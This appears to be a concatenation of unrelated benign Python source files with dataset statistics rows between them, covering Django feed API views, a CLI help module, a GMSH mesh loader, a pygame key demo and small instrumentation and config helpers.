        response.raise_for_status()
    except requests.exceptions.RequestException:
        raise QueryException('feed not found', 404)

    # The feed row and all of its entries are saved atomically: either
    # everything lands or nothing does.
    with transaction.atomic():
        d = feed_handler.text_2_d(response.text)
        feed = feed_handler.d_feed_2_feed(d.feed, url)
        feed.with_subscription_data()

        feed.save()

        feed_entries = []

        for d_entry in d.get('entries', []):
            feed_entry = None
            try:
                feed_entry = feed_handler.d_entry_2_feed_entry(d_entry)
            except ValueError:  # pragma: no cover
                # Skip entries the handler cannot parse.
                continue

            feed_entry.feed = feed
            feed_entries.append(feed_entry)

        models.FeedEntry.objects.bulk_create(feed_entries)

    return feed
def _feed_get(request):
    """GET handler: return one feed, fetching and saving it on first sight.

    Query params: `url` (required) plus the standard field-selection params
    understood by query_utils.
    """
    context = Context()
    context.parse_request(request)
    context.parse_query_dict(request.GET)

    url = request.GET.get('url')
    if not url:
        return HttpResponseBadRequest('\'url\' missing')

    # Normalize so equivalent spellings of a URL map to the same Feed row.
    url = url_normalize(url)

    field_maps = None
    try:
        fields = query_utils.get_fields__query_dict(request.GET)

        field_maps = query_utils.get_field_maps(fields, _OBJECT_NAME)
    except QueryException as e:  # pragma: no cover
        return HttpResponse(e.message, status=e.httpcode)

    feed = None
    try:
        feed = models.Feed.annotate_subscription_data(
            models.Feed.objects.all(), request.user).get(feed_url=url)
    except models.Feed.DoesNotExist:
        # Unknown feed: fetch and persist it now, propagating lookup errors
        # (e.g. 404) back to the client.
        try:
            feed = _save_feed(url)
        except QueryException as e:
            return HttpResponse(e.message, status=e.httpcode)

    ret_obj = query_utils.generate_return_object(field_maps, feed, context)

    content, content_type = query_utils.serialize_content(ret_obj)

    return HttpResponse(content, content_type)
def _feeds_query_post(request):
    """Query feeds: filter, sort and paginate per the JSON body, serialize.

    The body may request the matching objects, the total count, or both.
    """
    context = Context()
    context.parse_request(request)
    context.parse_query_dict(request.GET)

    if not request.body:
        return HttpResponseBadRequest('no HTTP body')  # pragma: no cover

    try:
        json_ = ujson.loads(request.body)
    except ValueError:  # pragma: no cover
        return HttpResponseBadRequest('HTTP body cannot be parsed')

    if type(json_) is not dict:
        return HttpResponseBadRequest('JSON body must be object')  # pragma: no cover

    # All extractors raise QueryException and are handled identically,
    # so they share one try block.
    try:
        count = query_utils.get_count(json_)
        skip = query_utils.get_skip(json_)
        sort = query_utils.get_sort(json_, _OBJECT_NAME)
        search = query_utils.get_search(context, json_, _OBJECT_NAME)
        fields = query_utils.get_fields__json(json_)
        field_maps = query_utils.get_field_maps(fields, _OBJECT_NAME)
        return_objects = query_utils.get_return_objects(json_)
        return_total_count = query_utils.get_return_total_count(json_)
    except QueryException as exc:  # pragma: no cover
        return HttpResponse(exc.message, status=exc.httpcode)

    feeds = models.Feed.annotate_search_vectors(
        models.Feed.annotate_subscription_data(
            models.Feed.objects.all(), request.user)).filter(*search)

    ret_obj = {}
    if return_objects:
        ret_obj['objects'] = [
            query_utils.generate_return_object(field_maps, feed, context)
            for feed in feeds.order_by(*sort)[skip:skip + count]
        ]
    if return_total_count:
        ret_obj['totalCount'] = feeds.count()

    content, content_type = query_utils.serialize_content(ret_obj)
    return HttpResponse(content, content_type)
def _feed_subscribe_post(request):
    """Subscribe the requesting user to the feed given by the ``url`` param.

    Responds 409 when the custom title is taken or the user is already
    subscribed, 204 on success.
    """
    user = request.user

    url = request.GET.get('url')
    if not url:
        return HttpResponseBadRequest('\'url\' missing')
    url = url_normalize(url)

    try:
        feed = models.Feed.objects.get(feed_url=url)
    except models.Feed.DoesNotExist:
        # Unknown feed: fetch and store it now.
        try:
            feed = _save_feed(url)
        except QueryException as exc:
            return HttpResponse(exc.message, status=exc.httpcode)

    custom_title = request.GET.get('customtitle')

    # Map feed_url -> custom title for the user's existing subscriptions.
    subscriptions = dict(models.SubscribedFeedUserMapping.objects.filter(
        user=user).values_list('feed__feed_url', 'custom_feed_title'))
    used_titles = {
        title for title in subscriptions.values() if title is not None}

    if custom_title is not None and custom_title in used_titles:
        return HttpResponse('custom title already used', status=409)
    if feed.feed_url in subscriptions:
        return HttpResponse('user already subscribed', status=409)

    read_mapping_generator = archived_feed_entry_util.read_mapping_generator_fn(
        feed, user)
    with transaction.atomic():
        models.SubscribedFeedUserMapping.objects.create(
            user=user, feed=feed, custom_feed_title=custom_title)
        archived_feed_entry_util.mark_archived_entries(read_mapping_generator)
    return HttpResponse(status=204)
def _feed_subscribe_put(request):
    """Replace the custom title of the user's subscription to ``url``.

    PUT semantics: the ``customtitle`` parameter value (or its absence)
    becomes the stored title.  Responds 404 when not subscribed, 409 when
    the title is already used by another subscription, 204 on success.
    """
    user = request.user

    url = request.GET.get('url')
    if not url:
        return HttpResponseBadRequest('\'url\' missing')
    url = url_normalize(url)

    custom_title = request.GET.get('customtitle')

    try:
        mapping = models.SubscribedFeedUserMapping.objects.get(
            user=user, feed__feed_url=url)
    except models.SubscribedFeedUserMapping.DoesNotExist:
        return HttpResponseNotFound('not subscribed')

    if custom_title is not None:
        title_taken = models.SubscribedFeedUserMapping.objects.exclude(
            uuid=mapping.uuid).filter(
            user=user, custom_feed_title=custom_title).exists()
        if title_taken:
            return HttpResponse('custom title already used', status=409)

    mapping.custom_feed_title = custom_title
    mapping.save(update_fields=['custom_feed_title'])

    return HttpResponse(status=204)
def _feed_subscribe_delete(request):
    """Remove the requesting user's subscription to the feed given by ``url``.

    Responds 404 when no subscription existed, 204 on success.
    """
    url = request.GET.get('url')
    if not url:
        return HttpResponseBadRequest('\'url\' missing')

    deleted_count, _ = models.SubscribedFeedUserMapping.objects.filter(
        user=request.user, feed__feed_url=url_normalize(url)).delete()

    if deleted_count < 1:
        return HttpResponseNotFound('user not subscribed')
    return HttpResponse(status=204)
| 30.681818 | 154 | 0.692877 | 1,063 | 8,775 | 5.480715 | 0.132643 | 0.055613 | 0.033471 | 0.039478 | 0.527291 | 0.479231 | 0.442499 | 0.427738 | 0.410917 | 0.396842 | 0 | 0.004099 | 0.221538 | 8,775 | 285 | 155 | 30.789474 | 0.848778 | 0.028946 | 0 | 0.455882 | 0 | 0 | 0.043269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044118 | false | 0 | 0.039216 | 0 | 0.259804 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5daabddd78accd0c119c7d00f383e8e6adda241 | 2,954 | py | Python | hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/settings.py | hallohubo/DjangoDocterAPI | 2d86d17c718affa968c0b2d4f9590aa08d43716e | [
"Apache-2.0"
] | 89 | 2015-04-10T14:34:05.000Z | 2021-11-08T09:17:09.000Z | hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/settings.py | hallohubo/DjangoDocterAPI | 2d86d17c718affa968c0b2d4f9590aa08d43716e | [
"Apache-2.0"
] | 13 | 2015-03-17T15:44:41.000Z | 2020-11-19T03:07:13.000Z | hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/settings.py | hallohubo/DjangoDocterAPI | 2d86d17c718affa968c0b2d4f9590aa08d43716e | [
"Apache-2.0"
] | 19 | 2015-05-13T09:18:12.000Z | 2021-04-28T10:35:39.000Z | #!/usr/bin/env python
# encoding: utf-8

# Package metadata and CLI help/usage text for the Naked framework
# executable.  All values here are plain module-level constants.

#------------------------------------------------------------------------------
# Application Name
#------------------------------------------------------------------------------
app_name = "naked"

#------------------------------------------------------------------------------
# Version Number
#------------------------------------------------------------------------------
major_version = "0"
minor_version = "1"
patch_version = "31"

#------------------------------------------------------------------------------
# Debug Flag (switch to False for production release code)
#------------------------------------------------------------------------------
debug = False

#------------------------------------------------------------------------------
# Usage String
#------------------------------------------------------------------------------
usage = """
Usage: naked <primary command> [secondary command] [option(s)] [argument(s)]
--- Use 'naked help' for detailed help ---
"""

#------------------------------------------------------------------------------
# Help String
#------------------------------------------------------------------------------
# NOTE(review): the module-level name `help` shadows the builtin help()
# inside this module.
help = """
---------------------------------------------------
Naked
A Python command line application framework
Copyright 2014 Christopher Simpkins
MIT license
---------------------------------------------------
ABOUT
The Naked framework includes the "naked" executable and the Python toolshed library. The naked executable is a command line tool for application development, testing, profiling, and deployment. The toolshed library contains numerous useful tools for application development that can be used through standard Python module imports. These features are detailed in the documentation (link below).
USAGE
The naked executable syntax is:
naked <primary command> [secondary command] [option(s)] [argument(s)]
The <primary command> is mandatory and includes one of the commands in the following section. The [bracketed] syntax structure is optional and dependent upon the primary command that you use. Use the command 'naked <primary command> help' for details about a command.
PRIMARY COMMANDS SECONDARY COMMANDS
args help
build help
classify help
dist all•help•sdist•swheel•wheel•win
help - none -
locate main•help•settings•setup
make help
profile help
pyh help
test nose•pytest•tox•unittest
usage - none -
version - none -
HELP
To learn more about a primary command, use the following syntax:
naked <primary command> help
DOCUMENTATION
http://docs.naked-py.com
SOURCE REPOSITORY
https://github.com/chrissimpkins/naked
ISSUE REPORTING
https://github.com/chrissimpkins/naked/issues
"""
| 33.954023 | 396 | 0.474611 | 269 | 2,954 | 5.237918 | 0.486989 | 0.069553 | 0.053939 | 0.039745 | 0.117814 | 0.072392 | 0.072392 | 0.072392 | 0.072392 | 0 | 0 | 0.003701 | 0.17671 | 2,954 | 86 | 397 | 34.348837 | 0.571135 | 0.314827 | 0 | 0.088889 | 0 | 0.066667 | 0.932203 | 0.090229 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5de3b649cde237814d8eb0d0baa2f698e762515 | 7,959 | py | Python | fempagno/modules/motoremesh.py | giovap95/metis-fem | f8a67698d1531a862e541f79229c0e4486edde6c | [
"MIT"
] | null | null | null | fempagno/modules/motoremesh.py | giovap95/metis-fem | f8a67698d1531a862e541f79229c0e4486edde6c | [
"MIT"
] | 2 | 2020-05-08T21:51:44.000Z | 2020-05-13T13:41:41.000Z | fempagno/modules/motoremesh.py | giovap95/metis-fem | f8a67698d1531a862e541f79229c0e4486edde6c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 18:54:01 2020
@author: giova
"""
import numpy as np
import sys
import meshio
# Creates a mesh class
class Mesh:
    """Container for finite-element mesh data.

    All fields start as ``None`` and are populated by a mesh loader
    (e.g. ``GMSH``): connectivity table, material tags, node counts,
    degrees of freedom per node, and the spatial dimension ``d``.
    """

    def __init__(self):
        # Create every slot empty; loaders fill them in later.
        for attr in ('el_def', 'material', 'conn_table', 'cds_table',
                     'elements', 'nodes', 'nodesperelem', 'dofspernode',
                     'totdofs', 'd'):
            setattr(self, attr, None)
#---------------------------------------------------------------------------
# Functions below do not belong to mesh Class
#---------------------------------------------------------------------------
def el_mat(mesh, i):
    """Return the material tag of element *i* from the mesh material table."""
    return mesh.material[i]
def el_type(mesh, i):
    """Return the element type of element *i*; abort on unknown types."""
    # TODO: eliminate this function
    etype = mesh.elementType[i]
    if etype not in (0, 1):
        print('\n', 'Element', i, 'ERROR! Element type not recognised')
        sys.exit()
    return etype
def coordinates(mesh, i):
    """Return the nodal coordinates of element *i*.

    Looks up the element's node indices in ``mesh.conn_table`` and uses
    them to index the rows of ``mesh.points``.
    """
    return mesh.points[mesh.conn_table[i]]
def NodesInElement(mesh, i):
    """Return the connectivity (node indices) of element *i*."""
    return mesh.conn_table[i]
def get_key(my_dict, val):
    """Return the key whose value's first item equals *val*.

    Example: if ``my_dict`` contains ``'Fixed': array([667, 0])``, then
    ``get_key(my_dict, 667)`` returns ``'Fixed'``.  Aborts the program
    when no entry matches.
    """
    _missing = object()
    found = next(
        (key for key, value in my_dict.items() if value[0] == val), _missing)
    if found is not _missing:
        return found
    print("\n value", val, "doesn't exist as 'key': array([value, 0]) in\n", my_dict)
    sys.exit()
def GMSH(mesh_file):
    """Load ``<mesh_file>.msh`` with meshio and adapt it for pyFEM.

    Adds the attributes pyFEM expects (connectivity table, per-element
    material names taken from GMSH physical groups, element types, the
    element library, ...) on top of the meshio mesh object and returns it.
    Aborts via sys.exit() on attribute clashes or when no quad/triangle
    elements are found.
    """
    sys.path.append("PRE")
    # create a mesh object
    # NOTE(review): hard-coded absolute Windows path — this only works on
    # the original author's machine and should be made configurable.
    mesh = meshio.read("D:/Documents/GitHub/metis-fem/fempagno/PRE/"+mesh_file+".msh")
    # check if the mesh object contains attributes needed by pyFEM
    # - pyFEM_MeshAttributes is a list of all the mesh attributes needed by pyFEM
    # - we are going to reuse the attribute points and add the other attribute from pyFEM_MeshAttributes
    pyFEM_MeshAttributes = ["d", "dofsNode", "elements", "elementMaterialTag", "elementType", "points"]
    for attribute in pyFEM_MeshAttributes:
        if attribute in dir(mesh):
            if attribute == "points":
                # 'points' is intentionally reused from meshio.
                pass
            else:
                print("Error: meshio already contains the attribute",attribute)
                print(" ...do something!")
                sys.exit()
    # add the missing attributes from pyFEM_MeshAttributes
    # Note: it is assumed that the mesh is two-dimensional and that the
    # domain is dicretized with triangular elements and that there are
    # two degrees of freedom per node (i.e., this is a plain equilibrium problem)
    mesh.elements = 0
    mesh.nodes = len(mesh.points)
    mesh.dofspernode = 2
    mesh.totdofs=mesh.nodes*mesh.dofspernode
    mesh.d = 2
    mesh.dofsNode = 2
    mesh.conn_table = []
    mesh.material = []
    mesh.el_def = []
    mesh.elementType = []
    mesh.material = []  # NOTE(review): duplicate re-initialisation (also set above)
    meshing = False
    # Probe for quadrilateral elements; absent keys raise KeyError.
    quad = False
    try:
        dummy = mesh.cell_data_dict['gmsh:physical']['quad']
        quad = True
    except KeyError:
        # print("No quadrilateral elements in mesh")
        pass
    # Probe for triangular elements.
    triangle = False
    try:
        dummy = mesh.cell_data_dict['gmsh:physical']['triangle']
        triangle = True
    except KeyError:
        # print("No triangular elements in mesh")
        pass
    if quad:
        meshing = True
        quads = len(mesh.cell_data_dict["gmsh:physical"]["quad"])
        mesh.elements += quads
        for t in range(quads):
            mesh.conn_table.append(mesh.cells_dict["quad"][t])
            materialTag=mesh.cell_data_dict["gmsh:physical"]["quad"][t]
            # we assume that a physical surface in 2D is only used to identify
            # elements with the same material property.
            # GMSH identifies a physical group by a tag and a name.
            # Tags are stores in cell_data_dict for each element.
            # Tags and names are linked in field_data
            # The function get_key returns the name (=key) for a given tag
            key = get_key(mesh.field_data, materialTag)
            mesh.material.append(key)
            mesh.elementType.append('quad')
    if triangle:
        meshing = True
        triangles = len(mesh.cell_data_dict["gmsh:physical"]["triangle"])
        mesh.elements += triangles
        for t in range(triangles):
            mesh.conn_table.append(mesh.cells_dict["triangle"][t])
            materialTag=mesh.cell_data_dict["gmsh:physical"]["triangle"][t]
            # Same physical-group-to-material mapping as for quads above.
            key = get_key(mesh.field_data, materialTag)
            mesh.material.append(key)
            mesh.elementType.append('triangle')
    if not meshing:
        print("something went wrong: could not extract mesh data")
        sys.exit()
    mesh.points = mesh.points[:, 0:mesh.d] #resize to the number of spatial dimensions in the problem
    # TODO: ...check that all the necessary attributes have been defined in a correct manner
    # library of the possible elements
    mesh.element_lib = { 'spring' : {'stiffness matrix' : {'evaluation' : 'closed form',
                                                           'domain' : None,
                                                           'rule' : None,
                                                           'points' : None}},
                         'bar' : {'stiffness matrix' : {'evaluation' : 'numerical integration',
                                                        'domain' : 'line',
                                                        'rule' : 'Gauss Legendre',
                                                        'points' : 2}},
                         'triangle' : {'stiffness matrix' : {'evaluation' : 'numerical integration',
                                                             'domain' : 'triangle',
                                                             'rule' : 'Gauss Legendre',
                                                             'points' : 1}},
                         'quad' : {'stiffness matrix' : {'evaluation' : 'numerical integration',
                                                         'domain' : 'quad',
                                                         'rule' : 'Gauss Legendre',
                                                         'points' : 4}}
                       }
    return mesh
| 33.1625 | 107 | 0.489257 | 819 | 7,959 | 4.678877 | 0.274725 | 0.016701 | 0.025052 | 0.025052 | 0.306628 | 0.29358 | 0.253653 | 0.211378 | 0.190501 | 0.169102 | 0 | 0.008058 | 0.407463 | 7,959 | 239 | 108 | 33.301255 | 0.804495 | 0.280437 | 0 | 0.191304 | 0 | 0 | 0.138163 | 0.007597 | 0 | 0 | 0 | 0.004184 | 0 | 1 | 0.06087 | false | 0.026087 | 0.026087 | 0 | 0.147826 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e0321b867fbd3540821c3d571734424765569b | 326 | py | Python | setup.py | mephizzle/python-funkyfunc | 5b7b9edc817830348227e8c7f9178d26ecc9991f | [
"Apache-2.0"
] | null | null | null | setup.py | mephizzle/python-funkyfunc | 5b7b9edc817830348227e8c7f9178d26ecc9991f | [
"Apache-2.0"
] | null | null | null | setup.py | mephizzle/python-funkyfunc | 5b7b9edc817830348227e8c7f9178d26ecc9991f | [
"Apache-2.0"
] | null | null | null | from distutils.core import setup
# Read the long description up front so the file handle is closed
# deterministically (the original inline open() was never closed).
with open('README.txt') as _readme:
    _long_description = _readme.read()

# Distutils packaging metadata for the FunkyFunk package.
setup(
    author='Marco Westerhof',
    author_email='mephistolomaniac@gmail.com',
    url='https://github.com/mephizzle/python-funkyfunc',
    name='FunkyFunk',
    version='0.0.2-dev',
    packages=['funkyfunc'],
    license='Apache 2.0',
    long_description=_long_description,
)
| 25.076923 | 56 | 0.677914 | 40 | 326 | 5.475 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018051 | 0.150307 | 326 | 12 | 57 | 27.166667 | 0.772563 | 0 | 0 | 0 | 0 | 0 | 0.407975 | 0.079755 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5e10452d84b6a103a29913ec774bc796c7a58d7 | 35 | py | Python | spartan/examples/sklearn/linear_model/__init__.py | GabrielWen/spartan | ce3bf7f2bb551d7f996a1884acef819b620cc854 | [
"Apache-2.0"
] | 156 | 2015-01-10T21:54:25.000Z | 2021-10-17T14:13:57.000Z | spartan/examples/sklearn/linear_model/__init__.py | GabrielWen/spartan | ce3bf7f2bb551d7f996a1884acef819b620cc854 | [
"Apache-2.0"
] | 8 | 2015-01-05T16:34:18.000Z | 2015-12-11T08:12:28.000Z | spartan/examples/sklearn/linear_model/__init__.py | GabrielWen/spartan | ce3bf7f2bb551d7f996a1884acef819b620cc854 | [
"Apache-2.0"
] | 24 | 2015-01-10T21:55:48.000Z | 2021-04-14T08:09:34.000Z | from .base import LinearRegression
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 5 |
e5e256e472aa9a2645b2b2a6d05bcb536688a4a9 | 1,116 | py | Python | pygame/key-event- get-changed-states/main-using-get_pressed.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 140 | 2017-02-21T22:49:04.000Z | 2022-03-22T17:51:58.000Z | pygame/key-event- get-changed-states/main-using-get_pressed.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 5 | 2017-12-02T19:55:00.000Z | 2021-09-22T23:18:39.000Z | pygame/key-event- get-changed-states/main-using-get_pressed.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 79 | 2017-01-25T10:53:33.000Z | 2022-03-11T16:13:57.000Z | #!/usr/bin/env python3
#
# https://stackoverflow.com/a/48034477/1832058
#
import pygame
pygame.init()

screen = pygame.display.set_mode((300, 200))

# Previous frame's key states, seeded before the loop so the first
# iteration has something to diff against.
pressed = pygame.key.get_pressed()

clock = pygame.time.Clock()

is_running = True
while is_running:
    # Quit on window close or the ESC key.
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            is_running = False
        elif event.type == pygame.KEYDOWN:
            if event.key == pygame.K_ESCAPE:
                is_running = False
    last_pressed = pressed
    pressed = pygame.key.get_pressed()
    # --- get only keys which changed state ---
    changed = [idx for idx in range(len(pressed)) if pressed[idx] != last_pressed[idx]]
    print(changed)
    # or
    changed = [idx for idx, (a, b) in enumerate(zip(last_pressed, pressed)) if a != b]
    print(changed)
    # --- True/False for all keys ---
    changed = [pressed[idx] != last_pressed[idx] for idx in range(len(pressed))]
    print(changed)
    # or
    changed = [a != b for a, b in zip(last_pressed, pressed)]
    print(changed)
    # ---
    clock.tick(25)  # cap the loop at 25 iterations per second

pygame.quit()
| 21.461538 | 87 | 0.612007 | 150 | 1,116 | 4.466667 | 0.373333 | 0.08209 | 0.080597 | 0.056716 | 0.222388 | 0.077612 | 0.077612 | 0 | 0 | 0 | 0 | 0.028812 | 0.253584 | 1,116 | 51 | 88 | 21.882353 | 0.77551 | 0.135305 | 0 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e25a60a68dadc256cd1d15a2436325f5c9ecdb | 828 | py | Python | epsagon/modules/sqlalchemy.py | Dryja/epsagon-python | 505b09268820593903afdce26e1bab7f64adc23b | [
"MIT"
] | 55 | 2018-09-30T11:46:01.000Z | 2022-03-15T13:37:26.000Z | epsagon/modules/sqlalchemy.py | Dryja/epsagon-python | 505b09268820593903afdce26e1bab7f64adc23b | [
"MIT"
] | 323 | 2018-10-04T15:42:08.000Z | 2022-02-20T11:26:40.000Z | epsagon/modules/sqlalchemy.py | Dryja/epsagon-python | 505b09268820593903afdce26e1bab7f64adc23b | [
"MIT"
] | 20 | 2018-10-11T14:47:16.000Z | 2022-01-20T11:07:29.000Z | """
sqlalchemy patcher module
"""
from __future__ import absolute_import
from epsagon.modules.general_wrapper import wrapper
from ..events.sqlalchemy import SqlAlchemyEventFactory
from ..utils import patch_once
def _wrapper(wrapped, instance, args, kwargs):
    """
    General wrapper for sqlalchemy instrumentation.
    :param wrapped: wrapt's wrapped
    :param instance: wrapt's instance
    :param args: wrapt's args
    :param kwargs: wrapt's kwargs
    :return: the result of the wrapped call, via the general event wrapper
    """
    return wrapper(SqlAlchemyEventFactory, wrapped, instance, args, kwargs)
def patch():
    """
    Patch module: instrument SQLAlchemy Session creation and close.
    :return: None
    """
    # Both lifecycle methods are wrapped with the same generic wrapper.
    for method_name in ('Session.__init__', 'Session.close'):
        patch_once('sqlalchemy.orm.session', method_name, _wrapper)
| 21.230769 | 75 | 0.665459 | 87 | 828 | 6.149425 | 0.367816 | 0.04486 | 0.071028 | 0.093458 | 0.134579 | 0.134579 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237923 | 828 | 38 | 76 | 21.789474 | 0.847861 | 0.286232 | 0 | 0.352941 | 0 | 0 | 0.137996 | 0.083176 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.235294 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e3335794c38081b262ad2769536aeb3e3e96ca | 471 | py | Python | access/website_tests/make_profile.py | ldbiz/ukwa-services | afa30cf631a3464e53f41244b989e32984c40294 | [
"Apache-2.0"
] | 2 | 2020-05-12T18:01:21.000Z | 2021-05-18T21:47:32.000Z | access/website_tests/make_profile.py | ldbiz/ukwa-services | afa30cf631a3464e53f41244b989e32984c40294 | [
"Apache-2.0"
] | 53 | 2020-01-23T16:10:53.000Z | 2022-03-30T16:59:17.000Z | access/website_tests/make_profile.py | ldbiz/ukwa-services | afa30cf631a3464e53f41244b989e32984c40294 | [
"Apache-2.0"
] | 5 | 2020-01-20T17:28:27.000Z | 2022-02-08T21:30:12.000Z | def make_profile():
def make_profile():
    """Build a Firefox profile that proxies HTTP and HTTPS through pywb:8080.

    Returns the filesystem path of the prepared profile directory.
    """
    from selenium import webdriver

    proxy_prefs = (
        ("network.proxy.http", "pywb"),
        ("network.proxy.http_port", 8080),
        ("network.proxy.share_proxy_settings", True),
        ("network.proxy.ssl", "pywb"),
        ("network.proxy.ssl_port", 8080),
        ("network.proxy.type", 1),  # 1 = manual proxy configuration
    )
    profile = webdriver.FirefoxProfile()
    for pref, value in proxy_prefs:
        profile.set_preference(pref, value)
    profile.update_preferences()
    return profile.path
| 33.642857 | 66 | 0.713376 | 62 | 471 | 5.225806 | 0.435484 | 0.092593 | 0.277778 | 0.407407 | 0.617284 | 0.617284 | 0.216049 | 0 | 0 | 0 | 0 | 0.022222 | 0.140127 | 471 | 13 | 67 | 36.230769 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0.297872 | 0.168085 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5e4afd5dbe24702344b3fb95577c4c8061e708c | 415 | py | Python | app/component/sink/resolver.py | melphi/kafkaform | 391c4c70b6aff9fd5ad703dcf4b6e863e92d53b6 | [
"MIT"
] | null | null | null | app/component/sink/resolver.py | melphi/kafkaform | 391c4c70b6aff9fd5ad703dcf4b6e863e92d53b6 | [
"MIT"
] | null | null | null | app/component/sink/resolver.py | melphi/kafkaform | 391c4c70b6aff9fd5ad703dcf4b6e863e92d53b6 | [
"MIT"
] | null | null | null | from typing import Optional
from app import model, client
from app.component.connect import resolver
class SinkResolver(resolver.BaseConnectResolver):
    """Connect resolver for sink connectors (``RESOURCE_SINK``)."""

    def __init__(self, *, connect_client: client.ConnectClient):
        # Fix the connector type to RESOURCE_SINK; everything else is
        # delegated to the base connect resolver.
        super().__init__(connect_client=connect_client, connector_type=model.RESOURCE_SINK)

    def _get_schema(self, target: model.SpecItem) -> Optional[model.SchemaParams]:
        # Sink connectors expose no schema to resolve.
        return None
| 31.923077 | 91 | 0.775904 | 49 | 415 | 6.265306 | 0.591837 | 0.127036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139759 | 415 | 12 | 92 | 34.583333 | 0.859944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.375 | 0.125 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 4 |
e5e4d509b89cb0862f92845dd6ce191e2a31dfb4 | 187 | py | Python | scrapy_cookies/signals.py | scrapedia/scrapy-cookies | 9741c767005254f5c427d3938ccad9ad74f93c2a | [
"BSD-3-Clause"
] | 13 | 2019-05-29T03:31:58.000Z | 2021-09-30T14:53:45.000Z | scrapy_cookies/signals.py | scrapedia/scrapy-cookies | 9741c767005254f5c427d3938ccad9ad74f93c2a | [
"BSD-3-Clause"
] | 18 | 2019-06-02T12:43:05.000Z | 2022-03-08T01:07:21.000Z | scrapy_cookies/signals.py | scrapedia/scrapy-cookies | 9741c767005254f5c427d3938ccad9ad74f93c2a | [
"BSD-3-Clause"
] | 11 | 2019-08-14T12:06:38.000Z | 2021-08-13T00:24:35.000Z | """
Scrapy-Cookies signals
These signals are documented in docs/topics/signals.rst. Please don't add new
signals here without documenting them there.
